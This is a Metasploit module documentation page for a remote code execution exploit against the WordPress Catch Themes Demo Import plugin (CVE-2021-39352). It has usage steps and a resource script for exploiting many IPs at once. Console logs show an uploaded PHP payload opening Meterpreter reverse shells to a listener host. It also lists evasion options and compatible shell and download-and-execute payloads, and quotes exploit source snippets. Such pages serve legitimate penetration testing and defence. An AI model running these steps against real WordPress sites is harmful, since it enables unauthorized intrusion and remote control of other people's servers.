Wordpress Plugin Catch Themes Demo Import RCE - Metasploit


This page contains detailed information about how to use the exploit/multi/http/wp_catch_themes_demo_import metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Wordpress Plugin Catch Themes Demo Import RCE
Module: exploit/multi/http/wp_catch_themes_demo_import
Source code: modules/exploits/multi/http/wp_catch_themes_demo_import.rb
Disclosure date: 2021-10-21
Last modification time: 2022-10-03 19:50:04 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-39352

The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to authenticated arbitrary file uploads via the import functionality found in the ~/inc/CatchThemesDemoImport.php file, due to insufficient file type validation. Re-exploitation may need a reboot of the server, or to wait an arbitrary timeout. During testing this timeout was roughly 5min.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Reliability:

  • unreliable-session: The module isn't expected to get a shell reliably (such as only once).

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


Using wp_catch_themes_demo_import against a single host

Normally, you can use exploit/multi/http/wp_catch_themes_demo_import this way:

msf > use exploit/multi/http/wp_catch_themes_demo_import
msf exploit(wp_catch_themes_demo_import) > show targets
    ... a list of targets ...
msf exploit(wp_catch_themes_demo_import) > set TARGET target-id
msf exploit(wp_catch_themes_demo_import) > show options
    ... show and set options ...
msf exploit(wp_catch_themes_demo_import) > exploit

Using wp_catch_themes_demo_import against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your wp_catch_themes_demo_import will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/wp_catch_themes_demo_import")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to authenticated arbitrary file uploads via the import functionality found in the ~/inc/CatchThemesDemoImport.php file, due to insufficient file type validation.

Of note, the check functionality may not detect the version of Catch Themes Demo Import due to the readme file not containing the proper version number line.

Re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.

Verification Steps


  1. Install the plugin to wordpress
  2. Start msfconsole
  3. Do: use exploits/multi/http/wp_catch_themes_demo_import
  4. Do: set rhosts
  5. Do: set username
  6. Do: set password
  7. Do: run
  8. You should get a shell.

Options


USERNAME

Username of the account which has post privileges. Defaults to admin.

PASSWORD

Password of the account which has post privileges. Defaults to admin

Scenarios


Wordpress Catch Themes Demo Import 1.6.1 on Wordpress 5.4.8 running on Ubuntu 20.04

resource (catch_theme.rb)> use exploits/multi/http/wp_catch_themes_demo_import
[*] Using configured payload php/meterpreter/reverse_tcp
resource (catch_theme.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (catch_theme.rb)> set username admin
username => admin
resource (catch_theme.rb)> set password admin
password => admin
resource (catch_theme.rb)> set verbose true
verbose => true
resource (catch_theme.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (catch_theme.rb)> run
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking /wp-content/plugins/catch-themes-demo-import/readme.txt
[!] The service is running, but could not be validated. Could not identify the version number
[*] Ajax Nonce: 11a5dba010
[*] Uploading payload filename: Y5LBjS3t.php
[*] Triggering payload at wp-content/uploads/2021/12/Y5LBjS3t.php
[*] Sending stage (39282 bytes) to 2.2.2.2
[+] Deleted Y5LBjS3t.php
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:34002 ) at 2021-12-21 20:01:30 -0500

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : wordpress2004
OS          : Linux wordpress2004 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64
Meterpreter : php/linux

Go back to menu.

Msfconsole Usage


Here is how the multi/http/wp_catch_themes_demo_import exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/wp_catch_themes_demo_import

[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_catch_themes_demo_import) > show info

       Name: Wordpress Plugin Catch Themes Demo Import RCE
     Module: exploit/multi/http/wp_catch_themes_demo_import
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2021-10-21

Provided by:
  h00die
  Ron Jost
  Thinkland Security Team

Module side effects:
 artifacts-on-disk
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 unreliable-session

Available targets:
  Id  Name
  --  ----
  0   Automatic Target

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   admin            yes       Password of the account
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path of the Wordpress server
  USERNAME   admin            yes       Username of the account
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are 
  vulnerable to authenticated arbitrary file uploads via the import 
  functionality found in the ~/inc/CatchThemesDemoImport.php file, due 
  to insufficient file type validation. Re-exploitation may need a 
  reboot of the server, or to wait an arbitrary timeout. During 
  testing this timeout was roughly 5min.

References:
  https://www.exploit-db.com/exploits/50580
  https://nvd.nist.gov/vuln/detail/CVE-2021-39352
  https://plugins.trac.wordpress.org/changeset/2617555/catch-themes-demo-import/trunk/inc/CatchThemesDemoImport.php
  https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39352
  https://wpscan.com/vulnerability/781f2ff4-cb94-40d7-96cb-90128daed862

Module Options


This is a complete list of options available in the multi/http/wp_catch_themes_demo_import exploit:

msf6 exploit(multi/http/wp_catch_themes_demo_import) > show options

Module options (exploit/multi/http/wp_catch_themes_demo_import):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       Password of the account
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path of the Wordpress server
   USERNAME   admin            yes       Username of the account
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Advanced Options


Here is a complete list of advanced options supported by the multi/http/wp_catch_themes_demo_import exploit:

msf6 exploit(multi/http/wp_catch_themes_demo_import) > show advanced

Module advanced options (exploit/multi/http/wp_catch_themes_demo_import):

   Name                    Current Setting                               Required  Description
   ----                    ---------------                               --------  -----------
   AllowNoCleanup          false                                         no        Allow exploitation without the possibility of cleaning up files
   AutoCheck               true                                          no        Run check before exploit
   ContextInformationFile                                                no        The information file that contains context information
   DOMAIN                  WORKSTATION                                   yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                          no        Conform to IIS, should work for most servers. Only set to false for non-IIS serv
                                                                                   ers
   DisablePayloadHandler   false                                         no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                         no        Use transient context when encoding payloads
   FileDropperDelay                                                      no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                          no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                         no        Override check result
   HttpClientTimeout                                                     no        HTTP connection and receive timeout
   HttpPassword                                                          no        The HTTP password to specify for authentication
   HttpRawHeaders                                                        no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                         no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                       no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                         no        Show HTTP headers only in HttpTrace
   HttpUsername                                                          no        The HTTP username to specify for authentication
   SSLVersion              Auto                                          yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiat
                                                                                   e) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/5.0 (iPad; CPU OS 15_1 like Mac OS X  no        The User-Agent header to use for all requests
                           ) AppleWebKit/605.1.15 (KHTML, like Gecko) V
                           ersion/15.0 Mobile/15E148 Safari/604.1
   VERBOSE                 false                                         no        Enable detailed status messages
   WORKSPACE                                                             no        Specify the workspace for this module
   WPCHECK                 true                                          yes       Check if the website is a valid WordPress install
   WPCONTENTDIR            wp-content                                    yes       The name of the wp-content directory
   WfsDelay                2                                             no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LH
                                                           OST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/wp_catch_themes_demo_import module can exploit:

msf6 exploit(multi/http/wp_catch_themes_demo_import) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Target

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/wp_catch_themes_demo_import exploit:

msf6 exploit(multi/http/wp_catch_themes_demo_import) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/generic/ssh/interact                                 normal  No     Interact with Established SSH Connection
   4   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   5   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   6   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   7   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   8   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   9   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   10  payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   11  payload/php/exec                                             normal  No     PHP Execute Command
   12  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   13  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   14  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   15  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   16  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   18  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   19  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   20  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/wp_catch_themes_demo_import exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/wp_catch_themes_demo_import) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u
                                                            -random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Wordpress not detected.


Here is a relevant code snippet related to the "Wordpress not detected." error message:

69:	      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']),
70:	    ]
71:	  end
72:	
73:	  def check
74:	    return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online?
75:	
76:	    checkcode = check_plugin_version_from_readme('catch-themes-demo-import', '1.8')
77:	    if checkcode == CheckCode::Safe
78:	      print_error('catch-themes-demo-import not a vulnerable version')
79:	    end

catch-themes-demo-import not a vulnerable version


Here is a relevant code snippet related to the "catch-themes-demo-import not a vulnerable version" error message:

73:	  def check
74:	    return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online?
75:	
76:	    checkcode = check_plugin_version_from_readme('catch-themes-demo-import', '1.8')
77:	    if checkcode == CheckCode::Safe
78:	      print_error('catch-themes-demo-import not a vulnerable version')
79:	    end
80:	    checkcode
81:	  end
82:	
83:	  def exploit

Invalid login, check credentials


Here is a relevant code snippet related to the "Invalid login, check credentials" error message:

82:	
83:	  def exploit
84:	    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
85:	
86:	    if cookie.nil?
87:	      vprint_error('Invalid login, check credentials')
88:	      return
89:	    end
90:	
91:	    # grab the ajax_nonce
92:	    res = send_request_cgi({

Site not responding


Here is a relevant code snippet related to the "Site not responding" error message:

96:	      'keep_cookies' => 'false', # for some reason wordpress gives back an unauth cookie here, so ignore it.
97:	      'vars_get' => {
98:	        'page' => 'catch-themes-demo-import'
99:	      }
100:	    })
101:	    fail_with(Failure::Unreachable, 'Site not responding') unless res
102:	    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
103:	    /"ajax_nonce":"(?<ajax_nonce>[a-z0-9]{10})"/ =~ res.body
104:	    fail_with(Failure::UnexpectedReply, 'Unable to find ajax_nonce on page') unless ajax_nonce
105:	    vprint_status("Ajax Nonce: #{ajax_nonce}")
106:	

Failed to retrieve page


Here is a relevant code snippet related to the "Failed to retrieve page" error message:

97:	      'vars_get' => {
98:	        'page' => 'catch-themes-demo-import'
99:	      }
100:	    })
101:	    fail_with(Failure::Unreachable, 'Site not responding') unless res
102:	    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
103:	    /"ajax_nonce":"(?<ajax_nonce>[a-z0-9]{10})"/ =~ res.body
104:	    fail_with(Failure::UnexpectedReply, 'Unable to find ajax_nonce on page') unless ajax_nonce
105:	    vprint_status("Ajax Nonce: #{ajax_nonce}")
106:	
107:	    random_filename = "#{rand_text_alphanumeric(6..12)}.php"

Unable to find ajax_nonce on page


Here is a relevant code snippet related to the "Unable to find ajax_nonce on page" error message:

99:	      }
100:	    })
101:	    fail_with(Failure::Unreachable, 'Site not responding') unless res
102:	    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
103:	    /"ajax_nonce":"(?<ajax_nonce>[a-z0-9]{10})"/ =~ res.body
104:	    fail_with(Failure::UnexpectedReply, 'Unable to find ajax_nonce on page') unless ajax_nonce
105:	    vprint_status("Ajax Nonce: #{ajax_nonce}")
106:	
107:	    random_filename = "#{rand_text_alphanumeric(6..12)}.php"
108:	    vprint_status("Uploading payload filename: #{random_filename}")
109:	

Site not responding


Here is a relevant code snippet related to the "Site not responding" error message:

124:	      'cookie' => cookie,
125:	      'keep_cookies' => 'true',
126:	      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
127:	      'data' => multipart_form.to_s
128:	    )
129:	    fail_with(Failure::Unreachable, 'Site not responding') unless res
130:	    fail_with(Failure::UnexpectedReply, 'Plugin not ready to process new payloads. Please retry in a few minutes.') if res.code == 200 && res.body.include?('afterAllImportAJAX')
131:	    fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res.code == 500
132:	    # yes, a 500. We uploaded a malformed item, so when it tries to import it, it fails.  This
133:	    # is actually positive as it won't display a malformed item anywhere in the UI.  Simply writes our payload, then exits (non-gracefully)
134:	    #

Plugin not ready to process new payloads. Please retry in a few minutes.


Here is a relevant code snippet related to the "Plugin not ready to process new payloads. Please retry in a few minutes." error message:

125:	      'keep_cookies' => 'true',
126:	      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
127:	      'data' => multipart_form.to_s
128:	    )
129:	    fail_with(Failure::Unreachable, 'Site not responding') unless res
130:	    fail_with(Failure::UnexpectedReply, 'Plugin not ready to process new payloads. Please retry in a few minutes.') if res.code == 200 && res.body.include?('afterAllImportAJAX')
131:	    fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res.code == 500
132:	    # yes, a 500. We uploaded a malformed item, so when it tries to import it, it fails.  This
133:	    # is actually positive as it won't display a malformed item anywhere in the UI.  Simply writes our payload, then exits (non-gracefully)
134:	    #
135:	    # [Fri Dec 24 16:48:00.904980 2021] [php7:error] [pid 440128] [client 192.168.2.199:38107] PHP Fatal error:  Uncaught Error: Class 'XMLReader' not found in /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php:123

Failed to upload payload


Here is a relevant code snippet related to the "Failed to upload payload" error message:

126:	      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
127:	      'data' => multipart_form.to_s
128:	    )
129:	    fail_with(Failure::Unreachable, 'Site not responding') unless res
130:	    fail_with(Failure::UnexpectedReply, 'Plugin not ready to process new payloads. Please retry in a few minutes.') if res.code == 200 && res.body.include?('afterAllImportAJAX')
131:	    fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res.code == 500
132:	    # yes, a 500. We uploaded a malformed item, so when it tries to import it, it fails.  This
133:	    # is actually positive as it won't display a malformed item anywhere in the UI.  Simply writes our payload, then exits (non-gracefully)
134:	    #
135:	    # [Fri Dec 24 16:48:00.904980 2021] [php7:error] [pid 440128] [client 192.168.2.199:38107] PHP Fatal error:  Uncaught Error: Class 'XMLReader' not found in /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php:123
136:	    # Stack trace:

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • h00die
  • Ron Jost
  • Thinkland Security Team

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.